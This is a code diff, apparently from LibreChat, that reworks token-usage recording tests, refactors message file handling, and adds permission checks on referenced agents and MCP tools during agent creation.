input_token_details: { cache_read: 31576, cache_creation: 0 },
|
|
||||||
model: 'claude-opus-4-5-20251101',
|
|
||||||
},
|
|
||||||
{
|
|
||||||
input_tokens: 146316,
|
|
||||||
output_tokens: 224,
|
|
||||||
total_tokens: 146540,
|
|
||||||
input_token_details: { cache_read: 31576, cache_creation: 0 },
|
|
||||||
model: 'claude-opus-4-5-20251101',
|
|
||||||
},
|
|
||||||
{
|
|
||||||
input_tokens: 150402,
|
|
||||||
output_tokens: 1248,
|
|
||||||
total_tokens: 151650,
|
|
||||||
input_token_details: { cache_read: 31576, cache_creation: 0 },
|
|
||||||
model: 'claude-opus-4-5-20251101',
|
|
||||||
},
|
|
||||||
{
|
|
||||||
input_tokens: 156268,
|
|
||||||
output_tokens: 139,
|
|
||||||
total_tokens: 156407,
|
|
||||||
input_token_details: { cache_read: 31576, cache_creation: 0 },
|
|
||||||
model: 'claude-opus-4-5-20251101',
|
|
||||||
},
|
|
||||||
{
|
|
||||||
input_tokens: 167126,
|
|
||||||
output_tokens: 2961,
|
|
||||||
total_tokens: 170087,
|
|
||||||
input_token_details: { cache_read: 31576, cache_creation: 0 },
|
|
||||||
model: 'claude-opus-4-5-20251101',
|
|
||||||
},
|
|
||||||
];
|
];
|
||||||
|
|
||||||
|
mockRecordCollectedUsage.mockResolvedValue({ input_tokens: 31596, output_tokens: 163 });
|
||||||
|
|
||||||
await client.recordCollectedUsage({
|
await client.recordCollectedUsage({
|
||||||
collectedUsage,
|
collectedUsage,
|
||||||
balance: { enabled: true },
|
balance: { enabled: true },
|
||||||
transactions: { enabled: true },
|
transactions: { enabled: true },
|
||||||
});
|
});
|
||||||
|
|
||||||
// input_tokens = first entry's input + cache_creation + cache_read
|
|
||||||
// = 788 + 30808 + 0 = 31596
|
|
||||||
expect(client.usage.input_tokens).toBe(31596);
|
expect(client.usage.input_tokens).toBe(31596);
|
||||||
|
expect(client.usage.output_tokens).toBe(163);
|
||||||
// output_tokens = sum of all output_tokens
|
|
||||||
// = 163 + 149 + 225 + 204 + 206 + 224 + 1248 + 139 + 2961 = 5519
|
|
||||||
expect(client.usage.output_tokens).toBe(5519);
|
|
||||||
|
|
||||||
// First 2 entries have cache tokens, should use spendStructuredTokens
|
|
||||||
// Remaining 7 entries have cache_read but no cache_creation, still structured
|
|
||||||
expect(mockSpendStructuredTokens).toHaveBeenCalledTimes(9);
|
|
||||||
expect(mockSpendTokens).toHaveBeenCalledTimes(0);
|
|
||||||
|
|
||||||
// Verify first entry uses structured tokens with cache_creation
|
|
||||||
expect(mockSpendStructuredTokens).toHaveBeenNthCalledWith(
|
|
||||||
1,
|
|
||||||
expect.objectContaining({ model: 'claude-opus-4-5-20251101' }),
|
|
||||||
{
|
|
||||||
promptTokens: { input: 788, write: 30808, read: 0 },
|
|
||||||
completionTokens: 163,
|
|
||||||
},
|
|
||||||
);
|
|
||||||
|
|
||||||
// Verify second entry uses structured tokens with both cache_creation and cache_read
|
|
||||||
expect(mockSpendStructuredTokens).toHaveBeenNthCalledWith(
|
|
||||||
2,
|
|
||||||
expect.objectContaining({ model: 'claude-opus-4-5-20251101' }),
|
|
||||||
{
|
|
||||||
promptTokens: { input: 3802, write: 768, read: 30808 },
|
|
||||||
completionTokens: 149,
|
|
||||||
},
|
|
||||||
);
|
|
||||||
});
|
|
||||||
});
|
|
||||||
|
|
||||||
describe('cache token handling', () => {
|
|
||||||
it('should handle OpenAI format cache tokens (input_token_details)', async () => {
|
|
||||||
const collectedUsage = [
|
|
||||||
{
|
|
||||||
input_tokens: 100,
|
|
||||||
output_tokens: 50,
|
|
||||||
model: 'gpt-4',
|
|
||||||
input_token_details: {
|
|
||||||
cache_creation: 20,
|
|
||||||
cache_read: 10,
|
|
||||||
},
|
|
||||||
},
|
|
||||||
];
|
|
||||||
|
|
||||||
await client.recordCollectedUsage({
|
|
||||||
collectedUsage,
|
|
||||||
balance: { enabled: true },
|
|
||||||
transactions: { enabled: true },
|
|
||||||
});
|
|
||||||
|
|
||||||
expect(mockSpendStructuredTokens).toHaveBeenCalledTimes(1);
|
|
||||||
expect(mockSpendStructuredTokens).toHaveBeenCalledWith(
|
|
||||||
expect.objectContaining({ model: 'gpt-4' }),
|
|
||||||
{
|
|
||||||
promptTokens: {
|
|
||||||
input: 100,
|
|
||||||
write: 20,
|
|
||||||
read: 10,
|
|
||||||
},
|
|
||||||
completionTokens: 50,
|
|
||||||
},
|
|
||||||
);
|
|
||||||
});
|
|
||||||
|
|
||||||
it('should handle Anthropic format cache tokens (cache_*_input_tokens)', async () => {
|
|
||||||
const collectedUsage = [
|
|
||||||
{
|
|
||||||
input_tokens: 100,
|
|
||||||
output_tokens: 50,
|
|
||||||
model: 'claude-3',
|
|
||||||
cache_creation_input_tokens: 25,
|
|
||||||
cache_read_input_tokens: 15,
|
|
||||||
},
|
|
||||||
];
|
|
||||||
|
|
||||||
await client.recordCollectedUsage({
|
|
||||||
collectedUsage,
|
|
||||||
balance: { enabled: true },
|
|
||||||
transactions: { enabled: true },
|
|
||||||
});
|
|
||||||
|
|
||||||
expect(mockSpendStructuredTokens).toHaveBeenCalledTimes(1);
|
|
||||||
expect(mockSpendStructuredTokens).toHaveBeenCalledWith(
|
|
||||||
expect.objectContaining({ model: 'claude-3' }),
|
|
||||||
{
|
|
||||||
promptTokens: {
|
|
||||||
input: 100,
|
|
||||||
write: 25,
|
|
||||||
read: 15,
|
|
||||||
},
|
|
||||||
completionTokens: 50,
|
|
||||||
},
|
|
||||||
);
|
|
||||||
});
|
|
||||||
|
|
||||||
it('should use spendTokens for entries without cache tokens', async () => {
|
|
||||||
const collectedUsage = [{ input_tokens: 100, output_tokens: 50, model: 'gpt-4' }];
|
|
||||||
|
|
||||||
await client.recordCollectedUsage({
|
|
||||||
collectedUsage,
|
|
||||||
balance: { enabled: true },
|
|
||||||
transactions: { enabled: true },
|
|
||||||
});
|
|
||||||
|
|
||||||
expect(mockSpendTokens).toHaveBeenCalledTimes(1);
|
|
||||||
expect(mockSpendStructuredTokens).not.toHaveBeenCalled();
|
|
||||||
});
|
|
||||||
|
|
||||||
it('should handle mixed cache and non-cache entries', async () => {
|
|
||||||
const collectedUsage = [
|
|
||||||
{ input_tokens: 100, output_tokens: 50, model: 'gpt-4' },
|
|
||||||
{
|
|
||||||
input_tokens: 150,
|
|
||||||
output_tokens: 30,
|
|
||||||
model: 'gpt-4',
|
|
||||||
input_token_details: { cache_creation: 10, cache_read: 5 },
|
|
||||||
},
|
|
||||||
{ input_tokens: 200, output_tokens: 20, model: 'gpt-4' },
|
|
||||||
];
|
|
||||||
|
|
||||||
await client.recordCollectedUsage({
|
|
||||||
collectedUsage,
|
|
||||||
balance: { enabled: true },
|
|
||||||
transactions: { enabled: true },
|
|
||||||
});
|
|
||||||
|
|
||||||
expect(mockSpendTokens).toHaveBeenCalledTimes(2);
|
|
||||||
expect(mockSpendStructuredTokens).toHaveBeenCalledTimes(1);
|
|
||||||
});
|
|
||||||
|
|
||||||
it('should include cache tokens in total input calculation', async () => {
|
|
||||||
const collectedUsage = [
|
|
||||||
{
|
|
||||||
input_tokens: 100,
|
|
||||||
output_tokens: 50,
|
|
||||||
model: 'gpt-4',
|
|
||||||
input_token_details: {
|
|
||||||
cache_creation: 20,
|
|
||||||
cache_read: 10,
|
|
||||||
},
|
|
||||||
},
|
|
||||||
];
|
|
||||||
|
|
||||||
await client.recordCollectedUsage({
|
|
||||||
collectedUsage,
|
|
||||||
balance: { enabled: true },
|
|
||||||
transactions: { enabled: true },
|
|
||||||
});
|
|
||||||
|
|
||||||
// Total input should include cache tokens: 100 + 20 + 10 = 130
|
|
||||||
expect(client.usage.input_tokens).toBe(130);
|
|
||||||
});
|
});
|
||||||
});
|
});
|
||||||
|
|
||||||
describe('model fallback', () => {
|
describe('model fallback', () => {
|
||||||
it('should use usage.model when available', async () => {
|
it('should use param model when available', async () => {
|
||||||
const collectedUsage = [{ input_tokens: 100, output_tokens: 50, model: 'gpt-4-turbo' }];
|
mockRecordCollectedUsage.mockResolvedValue({ input_tokens: 100, output_tokens: 50 });
|
||||||
|
|
||||||
await client.recordCollectedUsage({
|
|
||||||
model: 'fallback-model',
|
|
||||||
collectedUsage,
|
|
||||||
balance: { enabled: true },
|
|
||||||
transactions: { enabled: true },
|
|
||||||
});
|
|
||||||
|
|
||||||
expect(mockSpendTokens).toHaveBeenCalledWith(
|
|
||||||
expect.objectContaining({ model: 'gpt-4-turbo' }),
|
|
||||||
expect.any(Object),
|
|
||||||
);
|
|
||||||
});
|
|
||||||
|
|
||||||
it('should fallback to param model when usage.model is missing', async () => {
|
|
||||||
const collectedUsage = [{ input_tokens: 100, output_tokens: 50 }];
|
const collectedUsage = [{ input_tokens: 100, output_tokens: 50 }];
|
||||||
|
|
||||||
await client.recordCollectedUsage({
|
await client.recordCollectedUsage({
|
||||||
|
|
@ -630,14 +288,13 @@ describe('AgentClient - recordCollectedUsage', () => {
|
||||||
transactions: { enabled: true },
|
transactions: { enabled: true },
|
||||||
});
|
});
|
||||||
|
|
||||||
expect(mockSpendTokens).toHaveBeenCalledWith(
|
const [, params] = mockRecordCollectedUsage.mock.calls[0];
|
||||||
expect.objectContaining({ model: 'param-model' }),
|
expect(params.model).toBe('param-model');
|
||||||
expect.any(Object),
|
|
||||||
);
|
|
||||||
});
|
});
|
||||||
|
|
||||||
it('should fallback to client.model when param model is missing', async () => {
|
it('should fallback to client.model when param model is missing', async () => {
|
||||||
client.model = 'client-model';
|
client.model = 'client-model';
|
||||||
|
mockRecordCollectedUsage.mockResolvedValue({ input_tokens: 100, output_tokens: 50 });
|
||||||
const collectedUsage = [{ input_tokens: 100, output_tokens: 50 }];
|
const collectedUsage = [{ input_tokens: 100, output_tokens: 50 }];
|
||||||
|
|
||||||
await client.recordCollectedUsage({
|
await client.recordCollectedUsage({
|
||||||
|
|
@ -646,13 +303,12 @@ describe('AgentClient - recordCollectedUsage', () => {
|
||||||
transactions: { enabled: true },
|
transactions: { enabled: true },
|
||||||
});
|
});
|
||||||
|
|
||||||
expect(mockSpendTokens).toHaveBeenCalledWith(
|
const [, params] = mockRecordCollectedUsage.mock.calls[0];
|
||||||
expect.objectContaining({ model: 'client-model' }),
|
expect(params.model).toBe('client-model');
|
||||||
expect.any(Object),
|
|
||||||
);
|
|
||||||
});
|
});
|
||||||
|
|
||||||
it('should fallback to agent model_parameters.model as last resort', async () => {
|
it('should fallback to agent model_parameters.model as last resort', async () => {
|
||||||
|
mockRecordCollectedUsage.mockResolvedValue({ input_tokens: 100, output_tokens: 50 });
|
||||||
const collectedUsage = [{ input_tokens: 100, output_tokens: 50 }];
|
const collectedUsage = [{ input_tokens: 100, output_tokens: 50 }];
|
||||||
|
|
||||||
await client.recordCollectedUsage({
|
await client.recordCollectedUsage({
|
||||||
|
|
@ -661,15 +317,14 @@ describe('AgentClient - recordCollectedUsage', () => {
|
||||||
transactions: { enabled: true },
|
transactions: { enabled: true },
|
||||||
});
|
});
|
||||||
|
|
||||||
expect(mockSpendTokens).toHaveBeenCalledWith(
|
const [, params] = mockRecordCollectedUsage.mock.calls[0];
|
||||||
expect.objectContaining({ model: 'gpt-4' }),
|
expect(params.model).toBe('gpt-4');
|
||||||
expect.any(Object),
|
|
||||||
);
|
|
||||||
});
|
});
|
||||||
});
|
});
|
||||||
|
|
||||||
describe('getStreamUsage integration', () => {
|
describe('getStreamUsage integration', () => {
|
||||||
it('should return the usage object set by recordCollectedUsage', async () => {
|
it('should return the usage object set by recordCollectedUsage', async () => {
|
||||||
|
mockRecordCollectedUsage.mockResolvedValue({ input_tokens: 100, output_tokens: 50 });
|
||||||
const collectedUsage = [{ input_tokens: 100, output_tokens: 50, model: 'gpt-4' }];
|
const collectedUsage = [{ input_tokens: 100, output_tokens: 50, model: 'gpt-4' }];
|
||||||
|
|
||||||
await client.recordCollectedUsage({
|
await client.recordCollectedUsage({
|
||||||
|
|
@ -679,10 +334,7 @@ describe('AgentClient - recordCollectedUsage', () => {
|
||||||
});
|
});
|
||||||
|
|
||||||
const usage = client.getStreamUsage();
|
const usage = client.getStreamUsage();
|
||||||
expect(usage).toEqual({
|
expect(usage).toEqual({ input_tokens: 100, output_tokens: 50 });
|
||||||
input_tokens: 100,
|
|
||||||
output_tokens: 50,
|
|
||||||
});
|
|
||||||
});
|
});
|
||||||
|
|
||||||
it('should return undefined before recordCollectedUsage is called', () => {
|
it('should return undefined before recordCollectedUsage is called', () => {
|
||||||
|
|
@ -690,9 +342,9 @@ describe('AgentClient - recordCollectedUsage', () => {
|
||||||
expect(usage).toBeUndefined();
|
expect(usage).toBeUndefined();
|
||||||
});
|
});
|
||||||
|
|
||||||
|
/** Verifies usage passes the check in BaseClient.sendMessage: if (usage != null && Number(usage[this.outputTokensKey]) > 0) */
|
||||||
it('should have output_tokens > 0 for BaseClient.sendMessage check', async () => {
|
it('should have output_tokens > 0 for BaseClient.sendMessage check', async () => {
|
||||||
// This test verifies the usage will pass the check in BaseClient.sendMessage:
|
mockRecordCollectedUsage.mockResolvedValue({ input_tokens: 200, output_tokens: 130 });
|
||||||
// if (usage != null && Number(usage[this.outputTokensKey]) > 0)
|
|
||||||
const collectedUsage = [
|
const collectedUsage = [
|
||||||
{ input_tokens: 200, output_tokens: 100, model: 'gpt-4' },
|
{ input_tokens: 200, output_tokens: 100, model: 'gpt-4' },
|
||||||
{ input_tokens: 50, output_tokens: 30, model: 'gpt-4' },
|
{ input_tokens: 50, output_tokens: 30, model: 'gpt-4' },
|
||||||
|
|
|
||||||
|
|
@ -3,9 +3,9 @@ const { Constants, ViolationTypes } = require('librechat-data-provider');
|
||||||
const {
|
const {
|
||||||
sendEvent,
|
sendEvent,
|
||||||
getViolationInfo,
|
getViolationInfo,
|
||||||
|
buildMessageFiles,
|
||||||
GenerationJobManager,
|
GenerationJobManager,
|
||||||
decrementPendingRequest,
|
decrementPendingRequest,
|
||||||
sanitizeFileForTransmit,
|
|
||||||
sanitizeMessageForTransmit,
|
sanitizeMessageForTransmit,
|
||||||
checkAndIncrementPendingRequest,
|
checkAndIncrementPendingRequest,
|
||||||
} = require('@librechat/api');
|
} = require('@librechat/api');
|
||||||
|
|
@ -252,13 +252,10 @@ const ResumableAgentController = async (req, res, next, initializeClient, addTit
|
||||||
conversation.title =
|
conversation.title =
|
||||||
conversation && !conversation.title ? null : conversation?.title || 'New Chat';
|
conversation && !conversation.title ? null : conversation?.title || 'New Chat';
|
||||||
|
|
||||||
if (req.body.files && client.options?.attachments) {
|
if (req.body.files && Array.isArray(client.options.attachments)) {
|
||||||
userMessage.files = [];
|
const files = buildMessageFiles(req.body.files, client.options.attachments);
|
||||||
const messageFiles = new Set(req.body.files.map((file) => file.file_id));
|
if (files.length > 0) {
|
||||||
for (const attachment of client.options.attachments) {
|
userMessage.files = files;
|
||||||
if (messageFiles.has(attachment.file_id)) {
|
|
||||||
userMessage.files.push(sanitizeFileForTransmit(attachment));
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
delete userMessage.image_urls;
|
delete userMessage.image_urls;
|
||||||
}
|
}
|
||||||
|
|
@ -639,14 +636,10 @@ const _LegacyAgentController = async (req, res, next, initializeClient, addTitle
|
||||||
conversation.title =
|
conversation.title =
|
||||||
conversation && !conversation.title ? null : conversation?.title || 'New Chat';
|
conversation && !conversation.title ? null : conversation?.title || 'New Chat';
|
||||||
|
|
||||||
// Process files if needed (sanitize to remove large text fields before transmission)
|
if (req.body.files && Array.isArray(client.options.attachments)) {
|
||||||
if (req.body.files && client.options?.attachments) {
|
const files = buildMessageFiles(req.body.files, client.options.attachments);
|
||||||
userMessage.files = [];
|
if (files.length > 0) {
|
||||||
const messageFiles = new Set(req.body.files.map((file) => file.file_id));
|
userMessage.files = files;
|
||||||
for (const attachment of client.options.attachments) {
|
|
||||||
if (messageFiles.has(attachment.file_id)) {
|
|
||||||
userMessage.files.push(sanitizeFileForTransmit(attachment));
|
|
||||||
}
|
|
||||||
}
|
}
|
||||||
delete userMessage.image_urls;
|
delete userMessage.image_urls;
|
||||||
}
|
}
|
||||||
|
|
|
||||||
|
|
@ -38,6 +38,7 @@ const { loadAgentTools, loadToolsForExecution } = require('~/server/services/Too
|
||||||
const { findAccessibleResources } = require('~/server/services/PermissionService');
|
const { findAccessibleResources } = require('~/server/services/PermissionService');
|
||||||
const { getConvoFiles, saveConvo, getConvo } = require('~/models/Conversation');
|
const { getConvoFiles, saveConvo, getConvo } = require('~/models/Conversation');
|
||||||
const { spendTokens, spendStructuredTokens } = require('~/models/spendTokens');
|
const { spendTokens, spendStructuredTokens } = require('~/models/spendTokens');
|
||||||
|
const { getMultiplier, getCacheMultiplier } = require('~/models/tx');
|
||||||
const { getAgent, getAgents } = require('~/models/Agent');
|
const { getAgent, getAgents } = require('~/models/Agent');
|
||||||
const db = require('~/models');
|
const db = require('~/models');
|
||||||
|
|
||||||
|
|
@ -428,6 +429,7 @@ const createResponse = async (req, res) => {
|
||||||
toolRegistry: primaryConfig.toolRegistry,
|
toolRegistry: primaryConfig.toolRegistry,
|
||||||
userMCPAuthMap: primaryConfig.userMCPAuthMap,
|
userMCPAuthMap: primaryConfig.userMCPAuthMap,
|
||||||
tool_resources: primaryConfig.tool_resources,
|
tool_resources: primaryConfig.tool_resources,
|
||||||
|
actionsEnabled: primaryConfig.actionsEnabled,
|
||||||
});
|
});
|
||||||
},
|
},
|
||||||
toolEndCallback,
|
toolEndCallback,
|
||||||
|
|
@ -486,6 +488,10 @@ const createResponse = async (req, res) => {
|
||||||
thread_id: conversationId,
|
thread_id: conversationId,
|
||||||
user_id: userId,
|
user_id: userId,
|
||||||
user: createSafeUser(req.user),
|
user: createSafeUser(req.user),
|
||||||
|
requestBody: {
|
||||||
|
messageId: responseId,
|
||||||
|
conversationId,
|
||||||
|
},
|
||||||
...(userMCPAuthMap != null && { userMCPAuthMap }),
|
...(userMCPAuthMap != null && { userMCPAuthMap }),
|
||||||
},
|
},
|
||||||
signal: abortController.signal,
|
signal: abortController.signal,
|
||||||
|
|
@ -505,12 +511,18 @@ const createResponse = async (req, res) => {
|
||||||
const balanceConfig = getBalanceConfig(req.config);
|
const balanceConfig = getBalanceConfig(req.config);
|
||||||
const transactionsConfig = getTransactionsConfig(req.config);
|
const transactionsConfig = getTransactionsConfig(req.config);
|
||||||
recordCollectedUsage(
|
recordCollectedUsage(
|
||||||
{ spendTokens, spendStructuredTokens },
|
{
|
||||||
|
spendTokens,
|
||||||
|
spendStructuredTokens,
|
||||||
|
pricing: { getMultiplier, getCacheMultiplier },
|
||||||
|
bulkWriteOps: { insertMany: db.bulkInsertTransactions, updateBalance: db.updateBalance },
|
||||||
|
},
|
||||||
{
|
{
|
||||||
user: userId,
|
user: userId,
|
||||||
conversationId,
|
conversationId,
|
||||||
collectedUsage,
|
collectedUsage,
|
||||||
context: 'message',
|
context: 'message',
|
||||||
|
messageId: responseId,
|
||||||
balance: balanceConfig,
|
balance: balanceConfig,
|
||||||
transactions: transactionsConfig,
|
transactions: transactionsConfig,
|
||||||
model: primaryConfig.model || agent.model_parameters?.model,
|
model: primaryConfig.model || agent.model_parameters?.model,
|
||||||
|
|
@ -575,6 +587,7 @@ const createResponse = async (req, res) => {
|
||||||
toolRegistry: primaryConfig.toolRegistry,
|
toolRegistry: primaryConfig.toolRegistry,
|
||||||
userMCPAuthMap: primaryConfig.userMCPAuthMap,
|
userMCPAuthMap: primaryConfig.userMCPAuthMap,
|
||||||
tool_resources: primaryConfig.tool_resources,
|
tool_resources: primaryConfig.tool_resources,
|
||||||
|
actionsEnabled: primaryConfig.actionsEnabled,
|
||||||
});
|
});
|
||||||
},
|
},
|
||||||
toolEndCallback,
|
toolEndCallback,
|
||||||
|
|
@ -630,6 +643,10 @@ const createResponse = async (req, res) => {
|
||||||
thread_id: conversationId,
|
thread_id: conversationId,
|
||||||
user_id: userId,
|
user_id: userId,
|
||||||
user: createSafeUser(req.user),
|
user: createSafeUser(req.user),
|
||||||
|
requestBody: {
|
||||||
|
messageId: responseId,
|
||||||
|
conversationId,
|
||||||
|
},
|
||||||
...(userMCPAuthMap != null && { userMCPAuthMap }),
|
...(userMCPAuthMap != null && { userMCPAuthMap }),
|
||||||
},
|
},
|
||||||
signal: abortController.signal,
|
signal: abortController.signal,
|
||||||
|
|
@ -649,12 +666,18 @@ const createResponse = async (req, res) => {
|
||||||
const balanceConfig = getBalanceConfig(req.config);
|
const balanceConfig = getBalanceConfig(req.config);
|
||||||
const transactionsConfig = getTransactionsConfig(req.config);
|
const transactionsConfig = getTransactionsConfig(req.config);
|
||||||
recordCollectedUsage(
|
recordCollectedUsage(
|
||||||
{ spendTokens, spendStructuredTokens },
|
{
|
||||||
|
spendTokens,
|
||||||
|
spendStructuredTokens,
|
||||||
|
pricing: { getMultiplier, getCacheMultiplier },
|
||||||
|
bulkWriteOps: { insertMany: db.bulkInsertTransactions, updateBalance: db.updateBalance },
|
||||||
|
},
|
||||||
{
|
{
|
||||||
user: userId,
|
user: userId,
|
||||||
conversationId,
|
conversationId,
|
||||||
collectedUsage,
|
collectedUsage,
|
||||||
context: 'message',
|
context: 'message',
|
||||||
|
messageId: responseId,
|
||||||
balance: balanceConfig,
|
balance: balanceConfig,
|
||||||
transactions: transactionsConfig,
|
transactions: transactionsConfig,
|
||||||
model: primaryConfig.model || agent.model_parameters?.model,
|
model: primaryConfig.model || agent.model_parameters?.model,
|
||||||
|
|
|
||||||
|
|
@ -6,6 +6,7 @@ const {
|
||||||
agentCreateSchema,
|
agentCreateSchema,
|
||||||
agentUpdateSchema,
|
agentUpdateSchema,
|
||||||
refreshListAvatars,
|
refreshListAvatars,
|
||||||
|
collectEdgeAgentIds,
|
||||||
mergeAgentOcrConversion,
|
mergeAgentOcrConversion,
|
||||||
MAX_AVATAR_REFRESH_AGENTS,
|
MAX_AVATAR_REFRESH_AGENTS,
|
||||||
convertOcrToContextInPlace,
|
convertOcrToContextInPlace,
|
||||||
|
|
@ -35,6 +36,7 @@ const {
|
||||||
} = require('~/models/Agent');
|
} = require('~/models/Agent');
|
||||||
const {
|
const {
|
||||||
findPubliclyAccessibleResources,
|
findPubliclyAccessibleResources,
|
||||||
|
getResourcePermissionsMap,
|
||||||
findAccessibleResources,
|
findAccessibleResources,
|
||||||
hasPublicPermission,
|
hasPublicPermission,
|
||||||
grantPermission,
|
grantPermission,
|
||||||
|
|
@ -47,6 +49,7 @@ const { refreshS3Url } = require('~/server/services/Files/S3/crud');
|
||||||
const { filterFile } = require('~/server/services/Files/process');
|
const { filterFile } = require('~/server/services/Files/process');
|
||||||
const { updateAction, getActions } = require('~/models/Action');
|
const { updateAction, getActions } = require('~/models/Action');
|
||||||
const { getCachedTools } = require('~/server/services/Config');
|
const { getCachedTools } = require('~/server/services/Config');
|
||||||
|
const { getMCPServersRegistry } = require('~/config');
|
||||||
const { getLogStores } = require('~/cache');
|
const { getLogStores } = require('~/cache');
|
||||||
|
|
||||||
const systemTools = {
|
const systemTools = {
|
||||||
|
|
@ -58,6 +61,116 @@ const systemTools = {
|
||||||
const MAX_SEARCH_LEN = 100;
|
const MAX_SEARCH_LEN = 100;
|
||||||
const escapeRegex = (str = '') => str.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
|
const escapeRegex = (str = '') => str.replace(/[.*+?^${}()|[\]\\]/g, '\\$&');
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Validates that the requesting user has VIEW access to every agent referenced in edges.
|
||||||
|
* Agents that do not exist in the database are skipped — at create time, the `from` field
|
||||||
|
* often references the agent being built, which has no DB record yet.
|
||||||
|
* @param {import('librechat-data-provider').GraphEdge[]} edges
|
||||||
|
* @param {string} userId
|
||||||
|
* @param {string} userRole - Used for group/role principal resolution
|
||||||
|
* @returns {Promise<string[]>} Agent IDs the user cannot VIEW (empty if all accessible)
|
||||||
|
*/
|
||||||
|
const validateEdgeAgentAccess = async (edges, userId, userRole) => {
|
||||||
|
const edgeAgentIds = collectEdgeAgentIds(edges);
|
||||||
|
if (edgeAgentIds.size === 0) {
|
||||||
|
return [];
|
||||||
|
}
|
||||||
|
|
||||||
|
const agents = (await Promise.all([...edgeAgentIds].map((id) => getAgent({ id })))).filter(
|
||||||
|
Boolean,
|
||||||
|
);
|
||||||
|
|
||||||
|
if (agents.length === 0) {
|
||||||
|
return [];
|
||||||
|
}
|
||||||
|
|
||||||
|
const permissionsMap = await getResourcePermissionsMap({
|
||||||
|
userId,
|
||||||
|
role: userRole,
|
||||||
|
resourceType: ResourceType.AGENT,
|
||||||
|
resourceIds: agents.map((a) => a._id),
|
||||||
|
});
|
||||||
|
|
||||||
|
return agents
|
||||||
|
.filter((a) => {
|
||||||
|
const bits = permissionsMap.get(a._id.toString()) ?? 0;
|
||||||
|
return (bits & PermissionBits.VIEW) === 0;
|
||||||
|
})
|
||||||
|
.map((a) => a.id);
|
||||||
|
};
|
||||||
|
|
||||||
|
/**
|
||||||
|
* Filters tools to only include those the user is authorized to use.
|
||||||
|
* MCP tools must match the exact format `{toolName}_mcp_{serverName}` (exactly 2 segments).
|
||||||
|
* Multi-delimiter keys are rejected to prevent authorization/execution mismatch.
|
||||||
|
* Non-MCP tools must appear in availableTools (global tool cache) or systemTools.
|
||||||
|
*
|
||||||
|
* When `existingTools` is provided and the MCP registry is unavailable (e.g. server restart),
|
||||||
|
* tools already present on the agent are preserved rather than stripped — they were validated
|
||||||
|
* when originally added, and we cannot re-verify them without the registry.
|
||||||
|
* @param {object} params
|
||||||
|
* @param {string[]} params.tools - Raw tool strings from the request
|
||||||
|
* @param {string} params.userId - Requesting user ID for MCP server access check
|
||||||
|
* @param {Record<string, unknown>} params.availableTools - Global non-MCP tool cache
|
||||||
|
* @param {string[]} [params.existingTools] - Tools already persisted on the agent document
|
||||||
|
* @returns {Promise<string[]>} Only the authorized subset of tools
|
||||||
|
*/
|
||||||
|
const filterAuthorizedTools = async ({ tools, userId, availableTools, existingTools }) => {
|
||||||
|
const filteredTools = [];
|
||||||
|
let mcpServerConfigs;
|
||||||
|
let registryUnavailable = false;
|
||||||
|
const existingToolSet = existingTools?.length ? new Set(existingTools) : null;
|
||||||
|
|
||||||
|
for (const tool of tools) {
|
||||||
|
if (availableTools[tool] || systemTools[tool]) {
|
||||||
|
filteredTools.push(tool);
|
||||||
|
continue;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (!tool?.includes(Constants.mcp_delimiter)) {
|
||||||
|
continue;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (mcpServerConfigs === undefined) {
|
||||||
|
try {
|
||||||
|
mcpServerConfigs = (await getMCPServersRegistry().getAllServerConfigs(userId)) ?? {};
|
||||||
|
} catch (e) {
|
||||||
|
logger.warn(
|
||||||
|
'[filterAuthorizedTools] MCP registry unavailable, filtering all MCP tools',
|
||||||
|
e.message,
|
||||||
|
);
|
||||||
|
mcpServerConfigs = {};
|
||||||
|
registryUnavailable = true;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
const parts = tool.split(Constants.mcp_delimiter);
|
||||||
|
if (parts.length !== 2) {
|
||||||
|
logger.warn(
|
||||||
|
`[filterAuthorizedTools] Rejected malformed MCP tool key "${tool}" for user ${userId}`,
|
||||||
|
);
|
||||||
|
continue;
|
||||||
|
}
|
||||||
|
|
||||||
|
if (registryUnavailable && existingToolSet?.has(tool)) {
|
||||||
|
filteredTools.push(tool);
|
||||||
|
continue;
|
||||||
|
}
|
||||||
|
|
||||||
|
const [, serverName] = parts;
|
||||||
|
if (!serverName || !Object.hasOwn(mcpServerConfigs, serverName)) {
|
||||||
|
logger.warn(
|
||||||
|
`[filterAuthorizedTools] Rejected MCP tool "${tool}" — server "${serverName}" not accessible to user ${userId}`,
|
||||||
|
);
|
||||||
|
continue;
|
||||||
|
}
|
||||||
|
|
||||||
|
filteredTools.push(tool);
|
||||||
|
}
|
||||||
|
|
||||||
|
return filteredTools;
|
||||||
|
};
|
||||||
|
|
||||||
/**
|
/**
|
||||||
* Creates an Agent.
|
* Creates an Agent.
|
||||||
* @route POST /Agents
|
* @route POST /Agents
|
||||||
|
|
@ -75,22 +188,24 @@ const createAgentHandler = async (req, res) => {
|
||||||
agentData.model_parameters = removeNullishValues(agentData.model_parameters, true);
|
agentData.model_parameters = removeNullishValues(agentData.model_parameters, true);
|
||||||
}
|
}
|
||||||
|
|
||||||
const { id: userId } = req.user;
|
const { id: userId, role: userRole } = req.user;
|
||||||
|
|
||||||
|
if (agentData.edges?.length) {
|
||||||
|
const unauthorized = await validateEdgeAgentAccess(agentData.edges, userId, userRole);
|
||||||
|
if (unauthorized.length > 0) {
|
||||||
|
return res.status(403).json({
|
||||||
|
error: 'You do not have access to one or more agents referenced in edges',
|
||||||
|
agent_ids: unauthorized,
|
||||||
|
});
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
agentData.id = `agent_${nanoid()}`;
|
agentData.id = `agent_${nanoid()}`;
|
||||||
agentData.author = userId;
|
agentData.author = userId;
|
||||||
agentData.tools = [];
|
agentData.tools = [];
|
||||||
|
|
||||||
const availableTools = (await getCachedTools()) ?? {};
|
const availableTools = (await getCachedTools()) ?? {};
|
||||||
for (const tool of tools) {
|
agentData.tools = await filterAuthorizedTools({ tools, userId, availableTools });
|
||||||
if (availableTools[tool]) {
|
|
||||||
agentData.tools.push(tool);
|
|
||||||
} else if (systemTools[tool]) {
|
|
||||||
agentData.tools.push(tool);
|
|
||||||
} else if (tool.includes(Constants.mcp_delimiter)) {
|
|
||||||
agentData.tools.push(tool);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
const agent = await createAgent(agentData);
|
const agent = await createAgent(agentData);
|
||||||
|
|
||||||
|
|
